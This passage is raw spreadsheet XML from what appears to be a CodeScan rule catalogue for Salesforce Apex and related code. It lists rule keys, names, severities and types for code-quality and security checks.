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JeevanMandal\Desktop\CodeScan\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{7CFDDFB3-38B7-4C6F-B84D-1510E8DE2B74}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" tabRatio="500" firstSheet="5" activeTab="7" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="CodeScan Rule List" sheetId="1" r:id="rId1"/>
    <sheet name="apex" sheetId="2" r:id="rId2"/>
    <sheet name="vf and lightning" sheetId="3" r:id="rId3"/>
    <sheet name="javascript (cs)" sheetId="4" r:id="rId4"/>
    <sheet name="javascript (sonar)" sheetId="5" r:id="rId5"/>
    <sheet name="security hotspots (apex)" sheetId="6" r:id="rId6"/>
    <sheet name="security hotspots (vf and l)" sheetId="7" r:id="rId7"/>
    <sheet name="salesforce metadata" sheetId="8" r:id="rId8"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">'javascript (cs)'!$A$2:$F$51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4" i="1" l="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="3216" uniqueCount="1504">
  <si>
    <t>The versions used are as follows:</t>
  </si>
  <si>
    <t>The current rule count is:</t>
  </si>
  <si>
    <t>The current hotspot count is:</t>
  </si>
  <si>
    <t>This number includes Apex, Visualforce and Javascript rules (including SonarJS)</t>
  </si>
  <si>
    <t>These lists do not reflect the number of rules in the default Quality Profiles.</t>
  </si>
  <si>
    <t>Default Quality Profiles may or may not contain all rules available and are given as a recommended minimum.</t>
  </si>
  <si>
    <t>Quality profiles should be customised for your organisation's standards and needs.</t>
  </si>
  <si>
    <t>APEX RULES</t>
  </si>
  <si>
    <t>rules__key</t>
  </si>
  <si>
    <t>rules__name</t>
  </si>
  <si>
    <t>rules__mdDesc</t>
  </si>
  <si>
    <t>rules__severity</t>
  </si>
  <si>
    <t>rules__langName</t>
  </si>
  <si>
    <t>rules__type</t>
  </si>
  <si>
    <t>sf:EmptySwitchStatements</t>
  </si>
  <si>
    <t>Switch Statements Should Not Be Empty</t>
  </si>
  <si>
    <t>MINOR</t>
  </si>
  <si>
    <t>APEX</t>
  </si>
  <si>
    <t>CODE_SMELL</t>
  </si>
  <si>
    <t>sf:TooFewBranchesForASwitchStatement</t>
  </si>
  <si>
    <t>Too Few Branches for a Switch Statement</t>
  </si>
  <si>
    <t>sf:SwitchStmtsShouldHaveDefault</t>
  </si>
  <si>
    <t>Switch Statements Should Have a When Else Case</t>
  </si>
  <si>
    <t>CRITICAL</t>
  </si>
  <si>
    <t>sf:SwitchDensity</t>
  </si>
  <si>
    <t>Switch Statement is Too Dense</t>
  </si>
  <si>
    <t>MAJOR</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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common-sf:SkippedUnitTests</t>
  </si>
  <si>
    <t>Skipped unit tests should be either removed or fixed</t>
  </si>
  <si>
    <t>Skipped unit tests are considered as dead code. Either they should be activated again (and updated) or they should be removed.</t>
  </si>
  <si>
    <t>common-sf:DuplicatedBlocks</t>
  </si>
  <si>
    <t>Source files should not have any duplicated blocks</t>
  </si>
  <si>
    <t>An issue is created on a file as soon as there is at least one block of duplicated code on this file</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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common-sf:InsufficientBranchCoverage</t>
  </si>
  <si>
    <t>Branches should have sufficient coverage by tests</t>
  </si>
  <si>
    <t>sf:ClassWithoutTestClass</t>
  </si>
  <si>
    <t>Class Without Test Class</t>
  </si>
  <si>
    <t>sf:OneDeclarationPerLine</t>
  </si>
  <si>
    <t>One Declaration Per Line</t>
  </si>
  <si>
    <t>sf:AvoidFieldNameMatchingMethodName</t>
  </si>
  <si>
    <t>Avoid Field Name Matching Method Name</t>
  </si>
  <si>
    <t>sf:ExcessivePublicCount</t>
  </si>
  <si>
    <t>Excessive Public Count</t>
  </si>
  <si>
    <t>sf:AvoidReassigningParameters</t>
  </si>
  <si>
    <t>Avoid Reassigning Parameters</t>
  </si>
  <si>
    <t>sf:EmptySwitchLabel</t>
  </si>
  <si>
    <t>Empty Switch Label</t>
  </si>
  <si>
    <t>sf:IfStmtsMustUseBraces</t>
  </si>
  <si>
    <t>If Statements Must Use Braces</t>
  </si>
  <si>
    <t>sf:EqualsNull</t>
  </si>
  <si>
    <t>Equals Null</t>
  </si>
  <si>
    <t>BLOCKER</t>
  </si>
  <si>
    <t>sf:NonUnitTestContainsAsserts</t>
  </si>
  <si>
    <t>Non Test Method Contains Asserts</t>
  </si>
  <si>
    <t>sf:UnnecessaryLocalBeforeReturn</t>
  </si>
  <si>
    <t>Unnecessary Local Before Return</t>
  </si>
  <si>
    <t>sf:EmptyStatementBlock</t>
  </si>
  <si>
    <t>Avoid Empty Statement Blocks</t>
  </si>
  <si>
    <t>sf:UnescapedOutput</t>
  </si>
  <si>
    <t>Unescaped Error Message XSS</t>
  </si>
  <si>
    <t>VULNERABILITY</t>
  </si>
  <si>
    <t>sf:AvoidNotFinalPublicStaticFields</t>
  </si>
  <si>
    <t>Avoid Declaring Non-Final Public Static Fields</t>
  </si>
  <si>
    <t>sf:UnusedFormalParameter</t>
  </si>
  <si>
    <t>Unused Formal Parameter</t>
  </si>
  <si>
    <t>sf:AvoidConstantsInterface</t>
  </si>
  <si>
    <t>Avoid Constants Interface</t>
  </si>
  <si>
    <t>sf:AvoidRethrowingException</t>
  </si>
  <si>
    <t>Avoid Re-Throwing Exception</t>
  </si>
  <si>
    <t>sf:AvoidDuplicateLiterals</t>
  </si>
  <si>
    <t>Avoid Duplicate Literals</t>
  </si>
  <si>
    <t>XPath rule template</t>
  </si>
  <si>
    <t>sf:ConfusingTernary</t>
  </si>
  <si>
    <t>Confusing Ternary</t>
  </si>
  <si>
    <t>sf:CommentRequired</t>
  </si>
  <si>
    <t>Comment is Required</t>
  </si>
  <si>
    <t>sf:BadCrypto</t>
  </si>
  <si>
    <t>Apex Classes should use Random IV/Key</t>
  </si>
  <si>
    <t>sf:UncommentedEmptyConstructor</t>
  </si>
  <si>
    <t>Uncommented Empty Constructor</t>
  </si>
  <si>
    <t>sf:AbstractClassWithoutAbstractMethod</t>
  </si>
  <si>
    <t>Abstract Class Without Abstract Method</t>
  </si>
  <si>
    <t>sf:OpenRedirect</t>
  </si>
  <si>
    <t>URL Redirection to Untrusted Site</t>
  </si>
  <si>
    <t>sf:UnnecessaryFinalModifier</t>
  </si>
  <si>
    <t>Unnecessary Final Modifier</t>
  </si>
  <si>
    <t>sf:LeftBracesLinePositions</t>
  </si>
  <si>
    <t>Left Braces Positioning Should Be Consistent</t>
  </si>
  <si>
    <t>sf:UnitTestContainsTooManyAsserts</t>
  </si>
  <si>
    <t>Unit Test Method Contains Too Many Asserts</t>
  </si>
  <si>
    <t>sf:MisleadingVariableName</t>
  </si>
  <si>
    <t>Misleading Variable Name</t>
  </si>
  <si>
    <t>sf:MethodNamingConventions</t>
  </si>
  <si>
    <t>Method Naming Conventions</t>
  </si>
  <si>
    <t>sf:ExceptionAsFlowControl</t>
  </si>
  <si>
    <t>Exception as Flow Control</t>
  </si>
  <si>
    <t>sf:GodClass</t>
  </si>
  <si>
    <t>God Class Rule</t>
  </si>
  <si>
    <t>sf:EmptyStaticInitializer</t>
  </si>
  <si>
    <t>Empty Static Initializer</t>
  </si>
  <si>
    <t>sf:AssertEqualsOrder</t>
  </si>
  <si>
    <t>sf:AddEmptyString</t>
  </si>
  <si>
    <t>Add Empty String</t>
  </si>
  <si>
    <t>sf:AvoidSoqlWithNegativeLogic</t>
  </si>
  <si>
    <t>Avoid Calling SOQL with Negative Expressions.</t>
  </si>
  <si>
    <t>sf:UnusedPrivateMethod</t>
  </si>
  <si>
    <t>Unused Private Method</t>
  </si>
  <si>
    <t>sf:CyclomaticComplexity</t>
  </si>
  <si>
    <t>Cyclomatic Complexity</t>
  </si>
  <si>
    <t>sf:BooleanGetMethodName</t>
  </si>
  <si>
    <t>Boolean Get Method Name</t>
  </si>
  <si>
    <t>sf:NcssMethodCount</t>
  </si>
  <si>
    <t>NCSS Method Count</t>
  </si>
  <si>
    <t>sf:UnnecessaryReturn</t>
  </si>
  <si>
    <t>Unnecessary Return</t>
  </si>
  <si>
    <t>sf:UnnecessaryBooleanAssertion</t>
  </si>
  <si>
    <t>Unnecessary Boolean Assertion</t>
  </si>
  <si>
    <t>sf:CommentedTodo</t>
  </si>
  <si>
    <t>Avoid leaving TODO/FIXME comments in code</t>
  </si>
  <si>
    <t>INFO</t>
  </si>
  <si>
    <t>sf:AvoidHardCodedCredential</t>
  </si>
  <si>
    <t>Avoid Using Hard Coded Credentials for Authentication</t>
  </si>
  <si>
    <t>sf:StringToString</t>
  </si>
  <si>
    <t>String To String</t>
  </si>
  <si>
    <t>sf:EmptyTryBlock</t>
  </si>
  <si>
    <t>Empty Try Block</t>
  </si>
  <si>
    <t>sf:TooManyFields</t>
  </si>
  <si>
    <t>Too Many Fields</t>
  </si>
  <si>
    <t>sf:FailedUnitTest</t>
  </si>
  <si>
    <t>Failing Unit Tests</t>
  </si>
  <si>
    <t>This rule tracks failing unit tests and reports them as violations.</t>
  </si>
  <si>
    <t>sf:NonStaticInitializer</t>
  </si>
  <si>
    <t>Non Static Initializer</t>
  </si>
  <si>
    <t>sf:AvoidProtectedFieldInFinalClass</t>
  </si>
  <si>
    <t>Avoid Protected Field in Final Class</t>
  </si>
  <si>
    <t>sf:SuspiciousConstantFieldName</t>
  </si>
  <si>
    <t>Suspicious Constant Field Name</t>
  </si>
  <si>
    <t>sf:LongVariable</t>
  </si>
  <si>
    <t>Long Variable Name</t>
  </si>
  <si>
    <t>sf:UnnecessaryParentheses</t>
  </si>
  <si>
    <t>Unnecessary Parentheses</t>
  </si>
  <si>
    <t>sf:ExcessiveParameterList</t>
  </si>
  <si>
    <t>Excessive Parameter List</t>
  </si>
  <si>
    <t>sf:CouplingBetweenObjects</t>
  </si>
  <si>
    <t>Coupling Between Objects</t>
  </si>
  <si>
    <t>sf:AssignmentInOperand</t>
  </si>
  <si>
    <t>Avoid Assignments in Operands</t>
  </si>
  <si>
    <t>sf:AvoidPrefixingMethodParameters</t>
  </si>
  <si>
    <t>Avoid Prefixing Method Parameters</t>
  </si>
  <si>
    <t>sf:WhileLoopsMustUseBraces</t>
  </si>
  <si>
    <t>While Loops Must Use Braces</t>
  </si>
  <si>
    <t>sf:FutureMethodInLoop</t>
  </si>
  <si>
    <t>Avoid Calling @Future Methods Inside Loops</t>
  </si>
  <si>
    <t>sf:TooManyMethods</t>
  </si>
  <si>
    <t>Too Many Methods</t>
  </si>
  <si>
    <t>sf:IfElseStmtsMustUseBraces</t>
  </si>
  <si>
    <t>If Else Statements Must Use Braces</t>
  </si>
  <si>
    <t>sf:MethodReturnsInternalArray</t>
  </si>
  <si>
    <t>Method Returns Internal Array</t>
  </si>
  <si>
    <t>sf:UseCollectionIsEmpty</t>
  </si>
  <si>
    <t>Use Collection isEmpty</t>
  </si>
  <si>
    <t>sf:SingularField</t>
  </si>
  <si>
    <t>Private Field Could Be Declared Locally</t>
  </si>
  <si>
    <t>sf:AvoidDMLInUnitTests</t>
  </si>
  <si>
    <t>Avoid DML in Tests</t>
  </si>
  <si>
    <t>sf:ClassWithoutTestCases</t>
  </si>
  <si>
    <t>Test Methods in Non-Test Class</t>
  </si>
  <si>
    <t>sf:AvoidSoqlAggregate</t>
  </si>
  <si>
    <t>Avoid Calling Aggregate Functions on Non-Grouped Query</t>
  </si>
  <si>
    <t>sf:SOQLInjection</t>
  </si>
  <si>
    <t>Avoid Untrusted/Unescaped Variables in DML Query</t>
  </si>
  <si>
    <t>sf:LocalVariableCouldBeFinal</t>
  </si>
  <si>
    <t>Local Variable Could Be Final</t>
  </si>
  <si>
    <t>sf:ExceptionClassNaming</t>
  </si>
  <si>
    <t>Exception Class Naming</t>
  </si>
  <si>
    <t>sf:ReturnFromFinallyBlock</t>
  </si>
  <si>
    <t>Return from Finally Block</t>
  </si>
  <si>
    <t>sf:PositionLiteralsFirstInComparisons</t>
  </si>
  <si>
    <t>Position Literals First in Comparisons</t>
  </si>
  <si>
    <t>sf:UnnecessaryConversionTemporary</t>
  </si>
  <si>
    <t>Unnecessary Temporary Variable for String Conversion</t>
  </si>
  <si>
    <t>sf:UnconditionalIfStatement</t>
  </si>
  <si>
    <t>Unconditional If Statement</t>
  </si>
  <si>
    <t>sf:ClassNamingConventions</t>
  </si>
  <si>
    <t>Class Naming Conventions</t>
  </si>
  <si>
    <t>sf:SystemDebug</t>
  </si>
  <si>
    <t>Avoid calling System.debug()</t>
  </si>
  <si>
    <t>sf:UnreachableCode</t>
  </si>
  <si>
    <t>Unreachable Code</t>
  </si>
  <si>
    <t>sf:UnnecessaryConstructor</t>
  </si>
  <si>
    <t>Unnecessary Constructor</t>
  </si>
  <si>
    <t>sf:MisplacedNullCheck</t>
  </si>
  <si>
    <t>Misplaced Null Check</t>
  </si>
  <si>
    <t>sf:AvoidUsingTestIsRunningTest</t>
  </si>
  <si>
    <t>Avoid Using Test.isRunningTest()</t>
  </si>
  <si>
    <t>sf:FieldDeclarationsShouldBeAtStartOfClass</t>
  </si>
  <si>
    <t>Field Declarations Should be at the Start of a Class</t>
  </si>
  <si>
    <t>sf:VariableDeclarationHidesAnother</t>
  </si>
  <si>
    <t>Avoid declarations hiding another field or variable</t>
  </si>
  <si>
    <t>sf:EmptyFinallyBlock</t>
  </si>
  <si>
    <t>Empty Finally Block</t>
  </si>
  <si>
    <t>sf:NullAssignment</t>
  </si>
  <si>
    <t>Null Assignment</t>
  </si>
  <si>
    <t>sf:ShortMethodName</t>
  </si>
  <si>
    <t>Short Method Name</t>
  </si>
  <si>
    <t>sf:AvoidCatchingThrowable</t>
  </si>
  <si>
    <t>Avoid Catching Throwable</t>
  </si>
  <si>
    <t>sf:UnitAssertionsShouldIncludeMessage</t>
  </si>
  <si>
    <t>Unit Assertions should include a Message</t>
  </si>
  <si>
    <t>sf:AvoidSizeOfSoql</t>
  </si>
  <si>
    <t>Avoid Calling sizeOf on a SOQL Statement.</t>
  </si>
  <si>
    <t>sf:AtLeastOneConstructor</t>
  </si>
  <si>
    <t>At Least One Constructor</t>
  </si>
  <si>
    <t>sf:ShortClassName</t>
  </si>
  <si>
    <t>Short Class Name</t>
  </si>
  <si>
    <t>sf:CommentContent</t>
  </si>
  <si>
    <t>Invalid Comment Words or Phrases Found</t>
  </si>
  <si>
    <t>sf:UselessStringValueOf</t>
  </si>
  <si>
    <t>Useless String Value Of</t>
  </si>
  <si>
    <t>sf:AbstractNaming</t>
  </si>
  <si>
    <t>Abstract Naming Conventions</t>
  </si>
  <si>
    <t>sf:ArrayIsStoredDirectly</t>
  </si>
  <si>
    <t>Array is Stored Directly</t>
  </si>
  <si>
    <t>sf:LogicInversion</t>
  </si>
  <si>
    <t>Logic Inversion</t>
  </si>
  <si>
    <t>sf:UncommentedEmptyMethod</t>
  </si>
  <si>
    <t>Uncommented Empty Method</t>
  </si>
  <si>
    <t>sf:EmptyStatementNotInLoop</t>
  </si>
  <si>
    <t>Empty Statement Not in Loop</t>
  </si>
  <si>
    <t>sf:SimplifyBooleanReturns</t>
  </si>
  <si>
    <t>Simplify Boolean Returns</t>
  </si>
  <si>
    <t>sf:VariableCouldBeTransient</t>
  </si>
  <si>
    <t>Controller Variable Could Be Declared Transient</t>
  </si>
  <si>
    <t>sf:MethodWithSameNameAsEnclosingClass</t>
  </si>
  <si>
    <t>Method with Same Name as Enclosing Class</t>
  </si>
  <si>
    <t>sf:IdempotentOperations</t>
  </si>
  <si>
    <t>sf:UnitTestsShouldIncludeAssert</t>
  </si>
  <si>
    <t>Unit Test Method should include System.Assert</t>
  </si>
  <si>
    <t>sf:Csrf</t>
  </si>
  <si>
    <t>Avoid Making DML Operations in Controller Constructor/Action Method</t>
  </si>
  <si>
    <t>sf:ExcessiveMethodLength</t>
  </si>
  <si>
    <t>Excessive Method Length</t>
  </si>
  <si>
    <t>sf:AvoidForLoopToJustAddElementsToCollection</t>
  </si>
  <si>
    <t>Avoid For Loop To Just Add Elements To A Collection</t>
  </si>
  <si>
    <t>sf:AvoidGetSetMethods</t>
  </si>
  <si>
    <t>Avoid Get and Set Methods</t>
  </si>
  <si>
    <t>sf:ReturnEmptyArrayRatherThanNull</t>
  </si>
  <si>
    <t>Return Empty Array, Not Null</t>
  </si>
  <si>
    <t>sf:AvoidThrowingNewInstanceOfSameException</t>
  </si>
  <si>
    <t>Avoid Throwing New Instance of Same Exception</t>
  </si>
  <si>
    <t>sf:PreserveStackTrace</t>
  </si>
  <si>
    <t>Preserve Stack Trace</t>
  </si>
  <si>
    <t>sf:UseAnnotationOnTestClass</t>
  </si>
  <si>
    <t>Use the @IsTest annotation</t>
  </si>
  <si>
    <t>sf:DMLWithoutSharingEnabled</t>
  </si>
  <si>
    <t>Sharing should be Configured on Classes with DML</t>
  </si>
  <si>
    <t>sf:SimplifyConditional</t>
  </si>
  <si>
    <t>Unnecessary Null Check with instanceOf</t>
  </si>
  <si>
    <t>sf:FinalFieldCouldBeStatic</t>
  </si>
  <si>
    <t>Final Field Could Be Static</t>
  </si>
  <si>
    <t>sf:DUDataflowAnomalyAnalysis</t>
  </si>
  <si>
    <t>Potentially Unused Variable</t>
  </si>
  <si>
    <t>sf:UselessOperationOnImmutable</t>
  </si>
  <si>
    <t>Useless Operation On Immutable</t>
  </si>
  <si>
    <t>sf:UnusedLocalVariable</t>
  </si>
  <si>
    <t>Unused Local Variable</t>
  </si>
  <si>
    <t>sf:DirectAccessToTriggerArray</t>
  </si>
  <si>
    <t>Trigger.new and Trigger.old array elements should not be accessed directly.</t>
  </si>
  <si>
    <t>sf:AvoidDeeplyNestedIfStmts</t>
  </si>
  <si>
    <t>Avoid Deeply Nested If Statements</t>
  </si>
  <si>
    <t>sf:MultipleTriggersOnObject</t>
  </si>
  <si>
    <t>Avoid creating multiple triggers on the same object</t>
  </si>
  <si>
    <t>sf:CollapsibleIfStatements</t>
  </si>
  <si>
    <t>Collapsible If Statements</t>
  </si>
  <si>
    <t>sf:AvoidFinalLocalVariable</t>
  </si>
  <si>
    <t>Avoid Final Local Variable</t>
  </si>
  <si>
    <t>sf:AvoidCatchingNPE</t>
  </si>
  <si>
    <t>Avoid Catching NPE</t>
  </si>
  <si>
    <t>sf:NcssTypeCount</t>
  </si>
  <si>
    <t>NCSS Type Count</t>
  </si>
  <si>
    <t>sf:ClassNamedException</t>
  </si>
  <si>
    <t>Exception Classes Should Extend an Exception</t>
  </si>
  <si>
    <t>sf:AvoidMethodsBeforeInitializers</t>
  </si>
  <si>
    <t>Avoid Calling Methods before Initializers in Constructors</t>
  </si>
  <si>
    <t>sf:InefficientEmptyStringCheck</t>
  </si>
  <si>
    <t>Inefficient Empty String Check</t>
  </si>
  <si>
    <t>sf:ThrowFromFinallyBlock</t>
  </si>
  <si>
    <t>Throw from Finally Block</t>
  </si>
  <si>
    <t>sf:AvoidGlobalModifier</t>
  </si>
  <si>
    <t>Avoid Using Global Modifier</t>
  </si>
  <si>
    <t>sf:UseAssertEqualsInsteadOfAssertEquality</t>
  </si>
  <si>
    <t>Use System.assertEquals instead of System.assert</t>
  </si>
  <si>
    <t>sf:EmptyCatchBlock</t>
  </si>
  <si>
    <t>Empty Catch Block</t>
  </si>
  <si>
    <t>sf:AvoidLogicInTrigger</t>
  </si>
  <si>
    <t>Avoid Logic in Triggers</t>
  </si>
  <si>
    <t>sf:ImmutableField</t>
  </si>
  <si>
    <t>Immutable Field</t>
  </si>
  <si>
    <t>sf:EmptyMethodInAbstractClassShouldBeAbstract</t>
  </si>
  <si>
    <t>Empty Method in Abstract Class should be Abstract</t>
  </si>
  <si>
    <t>sf:UnnecessaryCaseChange</t>
  </si>
  <si>
    <t>Unnecessary Case Change</t>
  </si>
  <si>
    <t>sf:OnlyOneReturn</t>
  </si>
  <si>
    <t>Methods Should Not Have Too Many Return Statements</t>
  </si>
  <si>
    <t>sf:URDataflowAnomalyAnalysis</t>
  </si>
  <si>
    <t>Variable Not Assigned</t>
  </si>
  <si>
    <t>sf:UseAssertEqualsInsteadOfAssert</t>
  </si>
  <si>
    <t>sf:MethodCouldBeStatic</t>
  </si>
  <si>
    <t>Method Could Be Static</t>
  </si>
  <si>
    <t>sf:UnusedNullCheckInEquals</t>
  </si>
  <si>
    <t>Unused Null Check in Equals</t>
  </si>
  <si>
    <t>sf:UseAssertInsteadOfAssertEquals</t>
  </si>
  <si>
    <t>Use System.Assert instead of System.assertEquals</t>
  </si>
  <si>
    <t>sf:AbstractClassWithoutAnyMethod</t>
  </si>
  <si>
    <t>Abstract Class without any Methods</t>
  </si>
  <si>
    <t>sf:AvoidInstanceofChecksInCatchClause</t>
  </si>
  <si>
    <t>Avoid Instanceof Checks in Catch Clause</t>
  </si>
  <si>
    <t>sf:ControllerNaming</t>
  </si>
  <si>
    <t>Controller Naming Convention</t>
  </si>
  <si>
    <t>sf:AssignmentToNonFinalStatic</t>
  </si>
  <si>
    <t>Assignment To Non Final Static</t>
  </si>
  <si>
    <t>sf:AvoidSoqlInLoops</t>
  </si>
  <si>
    <t>Avoid Calling SOQL and DML Inside Loops.</t>
  </si>
  <si>
    <t>sf:AvoidSOQLInControllerGetter</t>
  </si>
  <si>
    <t>Avoid SOQL in Controller Getter Methods</t>
  </si>
  <si>
    <t>sf:UnescapedSource</t>
  </si>
  <si>
    <t>URL Parameters should be Escaped/Sanitized</t>
  </si>
  <si>
    <t>sf:BrokenNullCheck</t>
  </si>
  <si>
    <t>Broken Null Check</t>
  </si>
  <si>
    <t>sf:InsecureEndpoint</t>
  </si>
  <si>
    <t>Avoid Cleartext Transmission of Sensitive Information</t>
  </si>
  <si>
    <t>sf:VariableNamingConventions</t>
  </si>
  <si>
    <t>Variable Naming Conventions</t>
  </si>
  <si>
    <t>sf:AvoidCatchingGenericException</t>
  </si>
  <si>
    <t>Avoid Catching Generic Exceptions</t>
  </si>
  <si>
    <t>sf:RightBracesSpacingPositions</t>
  </si>
  <si>
    <t>Right Braces Spacing Should Be Consistent</t>
  </si>
  <si>
    <t>sf:UseSingleton</t>
  </si>
  <si>
    <t>Use Singleton</t>
  </si>
  <si>
    <t>sf:UnnecessaryWrapperObjectCreation</t>
  </si>
  <si>
    <t>Unnecessary Wrapper Object Creation</t>
  </si>
  <si>
    <t>sf:CallSuperInConstructor</t>
  </si>
  <si>
    <t>Call Super In Constructor</t>
  </si>
  <si>
    <t>sf:DoNotThrowExceptionInFinally</t>
  </si>
  <si>
    <t>Do Not Throw Exception in Finally</t>
  </si>
  <si>
    <t>sf:EmptyInitializer</t>
  </si>
  <si>
    <t>Empty Initializer</t>
  </si>
  <si>
    <t>sf:ForLoopsMustUseBraces</t>
  </si>
  <si>
    <t>For Loops Must Use Braces</t>
  </si>
  <si>
    <t>sf:NcssConstructorCount</t>
  </si>
  <si>
    <t>NCSS Constructor Count</t>
  </si>
  <si>
    <t>sf:LawOfDemeter</t>
  </si>
  <si>
    <t>Law of Demeter</t>
  </si>
  <si>
    <t>sf:AvoidSoqlWithoutLimits</t>
  </si>
  <si>
    <t>Avoid Calling SOQL Without a Where Clause or Limit Statement</t>
  </si>
  <si>
    <t>sf:TestClassWithoutTestCases</t>
  </si>
  <si>
    <t>Test Class without Test Methods</t>
  </si>
  <si>
    <t>sf:AvoidInsecureCookies</t>
  </si>
  <si>
    <t>Avoid Creating Cookies with isSecure Disabled</t>
  </si>
  <si>
    <t>sf:StringInstantiation</t>
  </si>
  <si>
    <t>String Instantiation</t>
  </si>
  <si>
    <t>sf:AvoidUsingHardCodedId</t>
  </si>
  <si>
    <t>Avoid Using Hard Coded Salesforce Id</t>
  </si>
  <si>
    <t>sf:AvoidBranchingStatementAsLastInLoop</t>
  </si>
  <si>
    <t>sf:RightBracesLinePositions</t>
  </si>
  <si>
    <t>Right Braces Positioning Should Be Consistent</t>
  </si>
  <si>
    <t>sf:UselessParentheses</t>
  </si>
  <si>
    <t>Useless Parentheses</t>
  </si>
  <si>
    <t>sf:UnusedModifier</t>
  </si>
  <si>
    <t>Unused Modifier</t>
  </si>
  <si>
    <t>sf:AvoidHardCodedError</t>
  </si>
  <si>
    <t>Avoid Hard Coded Error Messages</t>
  </si>
  <si>
    <t>sf:ConstructorCallsOverridableMethod</t>
  </si>
  <si>
    <t>Constructor Calls Overridable Method</t>
  </si>
  <si>
    <t>sf:AvoidUsingHardCodedIP</t>
  </si>
  <si>
    <t>Avoid Using Hard Coded IP</t>
  </si>
  <si>
    <t>sf:AvoidInstantiatingObjectsInLoops</t>
  </si>
  <si>
    <t>Avoid instantiating objects in loops</t>
  </si>
  <si>
    <t>sf:UnitTestsShouldIncludeStartTest</t>
  </si>
  <si>
    <t>Unit Test Method should include Test.StartTest() and Test.StopTest()</t>
  </si>
  <si>
    <t>sf:JumbledIncrementer</t>
  </si>
  <si>
    <t>Jumbled Incrementer</t>
  </si>
  <si>
    <t>sf:AvoidFieldNameMatchingTypeName</t>
  </si>
  <si>
    <t>Avoid Field Name Matching Type Name</t>
  </si>
  <si>
    <t>sf:NPathComplexity</t>
  </si>
  <si>
    <t>NPath Complexity</t>
  </si>
  <si>
    <t>sf:AvoidUsingSeeAllData</t>
  </si>
  <si>
    <t>Avoid Using @IsTest(SeeAllData=true)</t>
  </si>
  <si>
    <t>sf:UseLocaleWithCaseConversions</t>
  </si>
  <si>
    <t>Use Locale with Case Conversions</t>
  </si>
  <si>
    <t>sf:CallSuperTwiceInConstructor</t>
  </si>
  <si>
    <t>Avoid Calling Super Twice in a Constructor</t>
  </si>
  <si>
    <t>sf:CommentSize</t>
  </si>
  <si>
    <t>Comment is Too Large</t>
  </si>
  <si>
    <t>sf:UnusedPrivateField</t>
  </si>
  <si>
    <t>Unused Private Field</t>
  </si>
  <si>
    <t>sf:AvoidMultipleUnaryOperators</t>
  </si>
  <si>
    <t>Avoid Multiple Unary Operators</t>
  </si>
  <si>
    <t>sf:AvoidLiteralsInIfCondition</t>
  </si>
  <si>
    <t>Avoid Literals in If Condition</t>
  </si>
  <si>
    <t>sf:EmptyWhileStmt</t>
  </si>
  <si>
    <t>Empty While Statement</t>
  </si>
  <si>
    <t>sf:ShortVariable</t>
  </si>
  <si>
    <t>Short Variable Name</t>
  </si>
  <si>
    <t>sf:LeftBracesSpacingPositions</t>
  </si>
  <si>
    <t>Left Braces Spacing Should Be Consistent</t>
  </si>
  <si>
    <t>sf:ExcessiveClassLength</t>
  </si>
  <si>
    <t>Excessive Class Length</t>
  </si>
  <si>
    <t>sf:MissingStaticMethodInNonInstantiatableClass</t>
  </si>
  <si>
    <t>Missing Static Method in Non Instantiatable Class</t>
  </si>
  <si>
    <t>sf:EmptyIfStmt</t>
  </si>
  <si>
    <t>Empty If Statement</t>
  </si>
  <si>
    <t>sf:OldApiVersion</t>
  </si>
  <si>
    <t>API Version is too old</t>
  </si>
  <si>
    <t>sf:ForLoopShouldBeWhileLoop</t>
  </si>
  <si>
    <t>For Loop Should Be While Loop</t>
  </si>
  <si>
    <t>sf:AvoidPublicFields</t>
  </si>
  <si>
    <t>Class Variable Fields should not have Public Accessibility</t>
  </si>
  <si>
    <t>sf:CommentedOutCode</t>
  </si>
  <si>
    <t>Avoid Commented Out Code</t>
  </si>
  <si>
    <t>sf:UseObjectForClearerAPI</t>
  </si>
  <si>
    <t>Use Object for Clearer API</t>
  </si>
  <si>
    <t>sf:AuraEnabledWithoutCatchBlock</t>
  </si>
  <si>
    <t>@AuraEnabled should have Proper Error Handling</t>
  </si>
  <si>
    <t>sf:AvoidLosingExceptionInformation</t>
  </si>
  <si>
    <t>Avoid Losing Exception Information</t>
  </si>
  <si>
    <t>sf:exception</t>
  </si>
  <si>
    <t>Tracks CodeScan Parser Problems</t>
  </si>
  <si>
    <t>An exception occurred while parsing this file. Please send a description of this problem to support@code-scan.com.&lt;BR&gt;\n&lt;BR&gt;\nWARNING: No violation can be detected on this file due this error.</t>
  </si>
  <si>
    <t>sf:AvoidInsecureMessageDigests</t>
  </si>
  <si>
    <t>Avoid Insecure Digest Algorithms</t>
  </si>
  <si>
    <t>sf:AvoidNestedSwitchStmts</t>
  </si>
  <si>
    <t>Avoid Nested Switch Statements</t>
  </si>
  <si>
    <t>sf:AvoidReversedOperators</t>
  </si>
  <si>
    <t>Avoid Reversed Operators</t>
  </si>
  <si>
    <t>sf:AvoidHttpReferer</t>
  </si>
  <si>
    <t>Avoid Using HTTP Referer Headers</t>
  </si>
  <si>
    <t>sf:CatchBlockShouldDoMoreThanRethrow</t>
  </si>
  <si>
    <t>Catch Block Should Do More Than Rethrow</t>
  </si>
  <si>
    <t>sf:FieldLevelSecurity</t>
  </si>
  <si>
    <t>Field Level Security Vulnerabilities</t>
  </si>
  <si>
    <t>sf:SingleMethodSingleton</t>
  </si>
  <si>
    <t>Single Method Singleton</t>
  </si>
  <si>
    <t>sf:StatementsShouldBeOnSeparateLines</t>
  </si>
  <si>
    <t>Statements Should Be On Separate Lines</t>
  </si>
  <si>
    <t>sf:PossibleIncrementerBug</t>
  </si>
  <si>
    <t>Suspicious For Loop Incrementer</t>
  </si>
  <si>
    <t>sf:SimplifiedTernary</t>
  </si>
  <si>
    <t>sf:BrokenMathCast</t>
  </si>
  <si>
    <t>Unexpected Casting of Types</t>
  </si>
  <si>
